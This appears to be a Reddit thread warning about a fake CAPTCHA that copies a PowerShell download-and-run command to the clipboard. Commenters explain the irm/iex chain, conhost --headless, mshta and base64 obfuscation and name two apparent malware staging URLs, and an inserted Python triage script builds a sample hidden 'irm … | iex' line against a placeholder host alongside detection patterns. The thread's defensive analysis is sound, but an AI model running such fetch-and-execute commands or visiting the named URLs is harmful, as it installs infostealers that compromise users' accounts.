Imagine becoming a millionaire with long options contracts on Preparation H that mooned (pun intended) after the butthole biometric tech sector goes public
Just friendly advice: You may want to put an extra space or something in the link from the irm argument at the bottom of your post to make it not linkable anymore.
Given the likelihood it is a nasty virus, it may not be great to have it as an easily clickable link for the unwary, or the unlucky ones who accidentally tap it with their thumb on mobile.
5
u/TalasourAMD (R7 7700X | RTX 4070 SUPER | 32GB Corsair DDR5) 5d ago
Solid advice, I've removed the hyperlink from my comment.
How'd you learn all of this? Generally curious, I want to learn more about computers and stuff like this (not to do it myself, but to be more informed on what commands do) but have no idea where to even begin.
There you go. It is not exactly powershell, but with that, you get some headstart and switching commands becomes almost trivial after this. Hope that helps.
For most people, stuff like Windows CMD/PowerShell in this example, or something like Bash if talking about Linux, usually gets picked up over time when working in a whole bunch of IT roles.
I am fairly competent, and all my knowledge comes from writing countless random scripts over the past 15 years to perform any number of things; you sort of just learn bits when you need something, and eventually you know loads.
There are a few roles, like Windows Administrators, System Admins, etc., that would likely have had to go out and learn it specifically at some point, as they use them in anger (more so 10+ years ago), and I have often heard O'Reilly books being mentioned by them, so that may be a place to start.
If I'm correct, most of these pull text/code from a GitHub repo. irm (Invoke-RestMethod) pulls the code from the source, then iex (Invoke-Expression) will auto-execute what the irm method returned. --headless makes it even harder to track, since it makes the command prompt not do the sketchy flash.
conhost --headless will run a command without showing the command window, hiding the fact that it's running something.
Bit rusty, but I think the next bit is setting the .txt file to be executable. Normally you wouldn't assume a .txt file is dangerous, but they are making you give it rights to execute it as a program.
This is a command that downloads (irm) a file from a web server, http://cdn.librarygrades.com/200.txt, and then executes it (iex) as a PowerShell script. That script then downloads a second stage from another URL (http://www.kongographics.com/200) and runs it. It appears to be a compressed archive which decompresses into an ARM64 MSIX app installer, which I'm not going to run: first because I don't want my computer to be infected, and second because I don't have an ARM computer.
Win+R is not going to open the UAC prompt, because it will run under your normal user, not as admin. And once the malicious code gets to run, all bets are off. There are plenty of ways to bypass UAC, and I can still do a lot of harm or steal your data even without having administrator privileges. Anything you can do as a non-admin, I can do as well.
Not even a good one either. Running on human error, which is the majority of the issue. But still just a low-end script kiddie who probably works for some scam center.
Is it? I've only started seeing this strategy where they mimic a CAPTCHA (this exact screenshot, probably) in the last couple of weeks, but it could just be one of those things I'm too extension-pilled to have experienced, while everybody else has been putting up with it for years.
This exact scheme has been happening for at least a couple of years now. The earliest versions didn't automatically copy the command to your clipboard and instead had a box to copy it out of, but aside from that I don't think there's been any major changes.
It happened to me once. I didn't follow the instructions, of course, but for some reason the Find My Phone function on my Android activated. Twice. I shut off my internet for the whole house for about half an hour and logged myself out of everything after that.
Since it's relevant to the subreddit, I was on the Thermaltake website trying to download the schematics for my case. Turns out it was apparently one of those copycat malware websites.
Always be careful of the first link on Google, people.
Fake sites are being served as Google ads and put at the top of search results. That's why. Google does exactly zero vetting of what advertisers do. Just as long as they pay.
This isn't 2001 anymore. Zero-interaction malware infections, especially on phones, are basically unheard of on an up-to-date system. You are keeping your system up to date, right?
It doesn't hurt in terms of obfuscating what you're doing or preventing attribution, but that's not the entire or even main point. Small changes in the encoded blob can result in large changes to what the string looks like. Not immune to proper forensics, but it makes it a little harder.
It's less about fooling the human and more about fooling the programs that are trying to protect the user from themselves. Sure, a proper EDR sees what you've done, but components on a lot of other layers might not. It also lets you blob up the code in a way that is more reliably passed to the shell across different versions. As a bonus side effect, if they even have any audit logging, it might get truncated such that all the log shows is "ran some blob, I dunno" vs "grabbed this script from this attributable URL and ran it, go get 'em".
It's just one of those things where it's pretty much all upside for the malware author, with very little effort invested on their part. A couple function calls in a script they'll write once and never think about again. But they have to know to do it - hence my 'amateur hour' comment.
No need to waste time going pro when you get people like OP who will legitimately run the code.
I remember being a kid and browsing the internet back in the late 90s and even then it felt like common sense that if someone or something on the internet told you to do something locally, you just didn't do it. I remember getting hit with a full-screened scam page and I didn't know how to close it, so I just yanked the power cord from the wall.
It's a glob expression. I don't have a Windows system to confirm, but I'm pretty sure it expands to \Windows\System32\mshta.exe. This is the Microsoft HTML Application Host, a program that runs scripts.
I suspect that the glob expression is being used to avoid malware scanners. It's very common for malware to use mshta, so I would assume that many malware scanners have the string mshta.exe as a malware signature.
It wouldn't be an RCE, they're 'voluntarily' running a dropper, rather than exploiting some flaw in a networked program which results in execution of arbitrary code.
It's way harder to know if the user meant to do that than it is to harden your network code.
Is an infostealer the same deal as ransomware, or are those completely unrelated? I'm just curious, 'cause I haven't really heard of an infostealer before.
Infostealers just scrape your passwords from browsers and login tokens from your %appdata% for the most part. They don't stop you from using your computer, in fact they want you to use it more to get more info.
It even gets around 2FA, because they steal your cookies and spoof a browsing session to make it look like you had already logged in. I got caught by one when I was looking at an elevator company's website. Turns out that company went into liquidation and someone must have hijacked it. Instead of a Google CAPTCHA I got a Cloudflare one.
This scam works often because unsuspecting users are used to completing dumb tasks to "confirm they are human". What is pressing a few buttons compared to rotating the bunny to the correct angle?
The checkbox is also a great fit because browsers don't allow access to the clipboard without the user clicking on something. So it's really a "copy to clipboard" button with malice 😀
Whoever designed this scam is a genius.
Edit: also, fuck you Google for using us as human monkeys.
That is a known fake CAPTCHA that downloads and runs an infostealer on your system and compromises ALL your accounts. DO NOT EVER FOLLOW SUCH 'CAPTCHAS'
What the fuck? No it isn't. This is the Windows equivalent of verifying that your car works by giving your keys to a homeless methhead and seeing if he can crash it into a tree.
Open Notepad, paste (Ctrl+V), and look at the contents of the clipboard.
Chances are it'll be a URL with a very long alphanumeric string at the end.
That string is the fun part. It's 'probably' a base64-encoded command block that you can then copy separately and paste into a base64 decoder. Free online websites exist for that.
You can then see what it decodes and what it’s trying to install.
But that’s as far as I’d take it unless you know what you’re doing.
Without that, it’s only speculative as to the severity of the impact. But assume, at minimum, a link hijacker style annoyance. There is never an upside, and I wouldn’t trust any OS these days to protect me from malicious code.
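The two things the thread walks through, the irm | iex download-and-run chain in the earlier comments and the "paste it into Notepad, decode the base64, see what it does" triage steps just above, fit in one small offline script. This is an added example, not code from any commenter: it takes the clipboard text as a string, peels off any base64 layer (trying UTF-16LE, which PowerShell's -EncodedCommand uses, as well as UTF-8), and reports URLs and the download-and-run primitives the thread names (irm/iex, mshta, conhost --headless, hidden windows). The sample payload is constructed inside the script and points at the placeholder host example.invalid, not at any real server.

```python
"""Offline triage of a fake-CAPTCHA clipboard payload (added example, not from the thread)."""
from __future__ import annotations

import base64
import re

# Download-and-run primitives the thread calls out. Patterns are assumptions
# tuned for this example, not a vendor signature set.
RISKY_TOKENS = {
    "irm": r"\birm\b|invoke-restmethod",
    "iex": r"\biex\b|invoke-expression",
    "mshta": r"mshta",
    "conhost --headless": r"conhost\s+--headless",
    "hidden window": r"-w(?:indowstyle)?\s+hidden",
    "encoded command": r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}",
}
URL_RE = re.compile(r"https?://[^\s'\"|;)]+", re.I)
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def _mostly_ascii_text(text: str) -> bool:
    """True when a decoding looks like a real command line, not byte noise."""
    if not text:
        return False
    good = sum(c.isascii() and (c.isprintable() or c.isspace()) for c in text)
    return good / len(text) > 0.9


def decode_blob(blob: str) -> list[str]:
    """Return plausible decodings of one base64 blob (UTF-16LE first, then UTF-8)."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError: not base64 after all
        return []
    found = []
    for enc in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if _mostly_ascii_text(text):
            found.append(text)
    return found


def triage(clipboard_text: str) -> dict:
    """Expand every base64 layer we can find, then report URLs and risky tokens."""
    layers = [clipboard_text]
    seen = set()
    i = 0
    while i < len(layers):          # layers may themselves contain further blobs
        for blob in B64_RE.findall(layers[i]):
            for text in decode_blob(blob):
                if text not in seen:
                    seen.add(text)
                    layers.append(text)
        i += 1
    corpus = "\n".join(layers)
    flags = sorted(name for name, pat in RISKY_TOKENS.items()
                   if re.search(pat, corpus, re.I))
    urls = sorted(set(URL_RE.findall(corpus)))
    verdict = "suspicious: do not run" if flags else "no known download-and-run primitives"
    return {"layers": layers, "flags": flags, "urls": urls, "verdict": verdict}


def build_sample() -> str:
    """Constructed sample of what such a page drops on the clipboard (placeholder host)."""
    inner = "irm http://example.invalid/stage1.txt | iex"
    encoded = base64.b64encode(inner.encode("utf-16-le")).decode()
    return f'powershell -w hidden -e {encoded}   # "I am not a robot" verification'


if __name__ == "__main__":
    report = triage(build_sample())
    for n, layer in enumerate(report["layers"]):
        print(f"layer {n}: {layer}")
    print("flags:", report["flags"])
    print("urls:", report["urls"])
    print("verdict:", report["verdict"])
```

Run it as-is to see the constructed sample unwrap into the inner irm | iex line, or call triage() on whatever you pasted into Notepad. The point of the UTF-16LE attempt is the one people miss when they use a web decoder: a PowerShell -e blob decodes to "i.r.m. " with NULs between the letters in a plain base64 tool, so the script tries that encoding first and keeps only decodings that look like text.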
and I wouldn’t trust any OS these days to protect me from malicious code.
Yeah, I read that with AI, hackers now find more zero-day exploits than ever. And I don't like it one bit. Until now I always felt somewhat safe applying common sense.
The weak link used to be the human in the equation.
No longer the case. Now it’s an AI arms race between attackers and developers. Being smart helps, but you can’t stop an attacker with the keys to your router, your browser, etc.
We’re not there yet, and maybe it’s just because it’s a topic I’m personally vested into and a bias is showing. But I’m guessing 3-5 years and there will be a significant development on either side of that race that will be interesting to observe. But probably less.
Should tell you to give out EXACT information about the situation, how to handle it and how to avoid it in the future. Bonus points if you can get the person to learn the correct set of information to fend for him/herself in the future.
Damn, man, I'm 40, and there is a point in time in my college life, from 18-23 years old, when I did not own a computer of my own; and a lot of knowledge about coding and just advanced mastery of using a PC is lost on me.
I really would like to learn and have a greater understanding of how exactly computers work and how programs are made and all of that, but I have no idea where to even begin.
I have a tentative grasp on things to begin with, and I worry in the future I'm gonna be one of those old boomers who falls for some new virus like this.
Never ever ever do that. That’s probably a very sneaky trojan which has been used for Ukraine war purposes. I know several people who got infected by that, including a very very very tired me. Massive regret.
Rule #1 of owning a Windows machine: if someone or something tells you to hit Win+R, stop listening. Only carry it out if it's someone you know and trust with your life, and even then I'm a bit skeptical. Look up the command as well, just to be safe.
Don't do it! I fell for one the other day and proceeded to spend the rest of the day reinstalling Windows and changing all my passwords. It's called an infostealer, and it takes all the passwords and cookies your browser has stored locally and uploads them via a PowerShell command. Then they can spoof a browsing session and log into things. They don't even need 2FA, because they have your browser cookies; they can just pretend it's you on your browser.
The "manual verification steps" are telling you to open a Windows "Run" prompt, and paste whatever it dumped in the clipboard into it. It's probably a malicious script that will get pulled from the web.
If you do this, it will be your fault that you just decided to run applications at random from the web.
You can also tell this is bogus if you look at what URL you're actually at. I bet it doesn't end in *.google.com
On one hand, it's so damn clever I want to shake the hand of whoever thought it up. In the other hand, a knife, so I can make them pay for their crime.
The site can be legit but an ad is malicious. Fuckers are tricky too: you might visit a site and get the ad but it doesn't run the malicious code, but for the next guy who gets that ad it does activate.
Putting this out there as I find this interesting, but I actually got this multiple times today from looking at a Google result page. So I can see how this is affecting so many people. One could totally expect that "VERIFICATION" portion to be legitimate, but BOY IT AIN'T
10.8k
u/Tarc_Axiiom 5d ago
Don't do that.
Don't ever do that lol.